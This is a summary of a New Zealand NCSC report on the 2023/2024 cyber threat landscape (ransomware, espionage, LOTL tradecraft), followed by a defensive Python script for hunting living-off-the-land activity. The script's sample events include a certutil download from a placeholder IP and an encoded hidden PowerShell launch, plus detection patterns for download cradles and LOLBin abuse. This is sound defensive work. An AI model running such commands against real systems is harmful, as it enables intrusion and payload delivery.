Full Report
New Zealand’s National Cyber Security Centre (NCSC), part of the Government Communications Security Bureau (GCSB), revealed... The post "GCSB report reveals sophisticated attacks, boosts cyber resilience amid rising espionage and ransomware" appeared first on Industrial Cyber.
Analysis Summary
# Incident Report: New Zealand National Cyber Threat Landscape (2023/2024)
## Executive Summary
New Zealand faced 7,122 cybersecurity incidents in the period ending June 30, 2024, indicating an increasingly sophisticated threat landscape driven by both foreign state actors and financially motivated criminals. State-sponsored activity targeted espionage, while criminal actors focused heavily on sectors like healthcare through persistent ransomware threats. The overall response involved increased monitoring and operational disruption efforts, though the threat remains dynamic and complex.
## Incident Details
- Discovery Date: Throughout the reporting period ending June 30, 2024.
- Incident Date: Reporting period 2023–2024.
- Affected Organization: Broad impact across New Zealand public and private sectors, with specific mention of Government organizations, healthcare, information media, and telecommunications.
- Sector: Government, Healthcare, Information Media, Telecommunications, Critical Services, Education.
- Geography: New Zealand.
## Timeline of Events
### Initial Access
- Date/Time: Ongoing throughout the reporting period.
- Vector: Not specified per incident. Vectors inferred from the report include exploitation leading to ransomware deployment, possible software supply chain compromise, targeted intrusion against government and other high-value entities, and cyber-enabled fraud conducted through compromised business email accounts (BEC).
- Details: State actors target information of high intelligence value. Financially motivated actors frequently target healthcare because the urgency of restoring patient care raises the likelihood that a ransom is paid.
### Lateral Movement
- Details: Malicious actors, particularly state-sponsored ones, utilize **Living-Off-the-Land (LOTL)** tradecraft to maintain persistence and move undetected within networks for extended periods, often for espionage.
### Data Exfiltration/Impact
- Details: Data exfiltration is leveraged by ransomware actors for double extortion. Impacts include the loss of data (sometimes irretrievably), disruption of critical public services, operational downtime, and reputational damage. DDoS attacks were also used as a form of extortion in lieu of encryption.
### Detection & Response
- Detection: Of the incidents reported to the NCSC, 343 were recorded as being of potential national significance.
- Response Actions: Disruption efforts targeting actors and taking down their infrastructure produced a temporary decrease in financially motivated cyber incidents. The NCSC also addressed increased activity linked to the fallout from the Russia-Ukraine conflict.
## Attack Methodology
- Initial Access: Targeted intrusion, exploitation leading to ransomware/DDoS, Business Email Compromise (BEC).
- Persistence: **Living-Off-the-Land (LOTL)** techniques, preferred by state actors for long-term, low-noise access.
- Privilege Escalation: Not explicitly detailed, but implied for achieving impact goals.
- Defense Evasion: Use of LOTL tradecraft to evade detection.
- Credential Access: Implied through BEC and sophisticated intrusion methods necessary for ransomware deployment.
- Discovery: Targeted reconnaissance for high-value intelligence by state actors.
- Lateral Movement: Movement within the network using the same LOTL tradecraft (native system tools) that provides persistence, so that the activity blends into routine administration.
- Collection: Exfiltration of data for double extortion; acquisition of high intelligence value information by state actors.
- Exfiltration: Data exfiltration used to drive extortion demands.
- Impact: Service disruption (including DDoS), data loss/encryption (ransomware), and reputational harm.
## Impact Assessment
- Financial: Significant economic harm due to ransomware demands and operational disruption; rising scale of online scams and cyber-enabled fraud.
- Data Breach: Sensitive information targeted by state actors; data exfiltration used for extortion by criminal groups.
- Operational: Significant disruption to critical public services (especially healthcare), temporary inconvenience to major organizations.
- Reputational: Diminished public or customer trust following incidents.
## Indicators of Compromise
*IOCs were not detailed in the source material as focus was on threat trends and tactics.*
- Network indicators: [N/A]
- File indicators: [N/A]
- Behavioral indicators: Use of LOTL tradecraft for persistence and evasion.
## Response Actions
- Containment: Disruption efforts against criminal actors and their infrastructure led to a temporary decrease in financially motivated incidents, including ransomware.
- Eradication: [Specific eradication steps not detailed in the high-level report.]
- Recovery: Efforts to restore critical services and confidence following impactful incidents.
## Lessons Learned
- Threat actors (both state and criminal) are increasingly sophisticated, leveraging global instability (e.g., geopolitical conflicts) to fuel activity.
- Ransomware actors are evolving beyond encryption, prioritizing data exfiltration for continuous extortion leverage (double extortion).
- Cyber criminals are abandoning earlier restraint, increasingly targeting sensitive entities such as hospitals and using harassment of victims, including threats to life, to coerce ransom payments.
- Because LOTL tradecraft uses native tools rather than malware, detecting it requires monitoring that baselines normal system behaviour and surfaces subtle deviations from it; file-based indicators alone will not reveal it.
## Recommendations
- Strengthen organizational awareness and fundamental cybersecurity hygiene across all sectors.
- Harden defenses against ransomware with robust, tested backup and recovery plans (including copies the attacker cannot reach from the compromised network), and prepare for double extortion: backups restore availability but do not remove the leverage of already-exfiltrated data, so exfiltration detection and breach handling must be planned as well.
- Enhance threat hunting focused on detecting LOTL techniques, such as anomalous use of native administrative tools, to counter state-sponsored persistence.
- Organizations must understand that threats are dynamic; cyber criminals are quickly altering methodologies, requiring adaptive risk management.
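The LOTL hunting that the Lessons Learned (monitoring for deviations from normal behaviour) and the Recommendations (threat hunting for LOTL techniques) both call for, shown as an added Python example; this is not code from the NCSC report or from Industrial Cyber. It assumes process-creation telemetry in the shape of Sysmon Event ID 1 / Windows 4688 fields (parent, image, command line, user, host). The baseline events, the events hunted over, the host and user names, the 203.0.113.10 address and the choice of LOLBin argument patterns are all constructed for illustration and are not indicators from any real incident.

```python
"""
LOTL hunt over process-creation telemetry (Sysmon Event ID 1 / Windows 4688 style).
Two detectors run over each event:
  1. Signature: a native binary (LOLBin) launched with arguments that have no
     place in routine administration (encoded PowerShell, certutil downloads, ...).
  2. Baseline deviation: a parent->child pair never seen in a learning window,
     which catches native tools used in unusual ways even when no signature fires.
All events, hosts, users and the 203.0.113.10 address are constructed placeholders.
"""
import base64
import re
from collections import Counter

# Constructed "known-good" telemetry; in practice this is weeks of real data.
BASELINE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"host": "ws01", "user": "CORP\\alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users\\alice"},
    {"host": "ws01", "user": "NT AUTHORITY\\SYSTEM", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws02", "user": "CORP\\bob", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe 12288"},
]

# Constructed events to hunt over. The -enc value is base64 of UTF-16LE "Get-Date".
HUNT_EVENTS = [
    {"host": "ws02", "user": "CORP\\bob", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc RwBlAHQALQBEAGEAdABlAA=="},
    {"host": "ws01", "user": "NT AUTHORITY\\SYSTEM", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/u.txt C:\\ProgramData\\u.txt"},
    {"host": "ws01", "user": "CORP\\alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"host": "ws01", "user": "CORP\\alice", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami /all"},
]

# (image name, argument pattern, explanation). Illustrative, not exhaustive.
LOLBIN_RULES = [
    ("powershell.exe",
     re.compile(r"-e(?:c|nc|ncodedcommand)?\s|-nop\b|-w(?:indowstyle)?\s+hidden|downloadstring|\biex\b", re.I),
     "PowerShell with encoded, hidden or download-cradle arguments"),
    ("certutil.exe", re.compile(r"-urlcache|-decode|-encode", re.I), "certutil used as a downloader or decoder"),
    ("mshta.exe", re.compile(r"vbscript:|javascript:|https?://", re.I), "mshta running inline or remote script"),
    ("regsvr32.exe", re.compile(r"/i:https?://|scrobj\.dll", re.I), "regsvr32 loading a remote scriptlet"),
    ("wmic.exe", re.compile(r"process\s+call\s+create|/node:", re.I), "WMIC process creation, possibly remote"),
]

def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()

def decode_encoded_command(cmdline: str):
    """Return the decoded PowerShell -enc payload (base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def signature_hits(event: dict) -> list:
    """Explanations for every LOLBin rule the event matches, plus any decoded -enc payload."""
    image = basename(event["image"])
    hits = [why for name, pat, why in LOLBIN_RULES if image == name and pat.search(event["cmdline"])]
    if image == "powershell.exe":
        decoded = decode_encoded_command(event["cmdline"])
        if decoded is not None:
            hits.append(f"decoded -enc payload: {decoded!r}")
    return hits

def build_baseline(events: list) -> Counter:
    """Count parent->child pairs seen during the learning window."""
    return Counter((basename(e["parent"]), basename(e["image"])) for e in events)

def hunt(events: list, baseline: Counter) -> list:
    """Flag events that match a signature, deviate from the baseline, or both."""
    findings = []
    for idx, e in enumerate(events):
        reasons = signature_hits(e)
        pair = (basename(e["parent"]), basename(e["image"]))
        novel = pair not in baseline
        if novel:
            reasons.append(f"parent->child pair unseen in baseline: {pair[0]} -> {pair[1]}")
        if reasons:
            # Signature plus an unseen lineage is the strongest LOTL signal.
            severity = "high" if novel and len(reasons) > 1 else "medium"
            findings.append({"index": idx, "host": e["host"], "user": e["user"],
                             "image": pair[1], "severity": severity, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in hunt(HUNT_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(f"[{f['severity']}] {f['host']} {f['user']} {f['image']}: " + "; ".join(f["reasons"]))
```

Run as written, the hunt flags the Word-spawned encoded PowerShell and the certutil download as high (signature plus unseen lineage), the WMI-spawned `whoami` as medium on lineage alone, and leaves the routine Explorer-spawned PowerShell untouched because that pair is in the baseline. The lineage detector is what the "subtle deviations from normal behaviour" point comes down to: it needs a baseline built from enough genuine telemetry that ordinary admin activity is already in it, otherwise it drowns the hunter in medium findings.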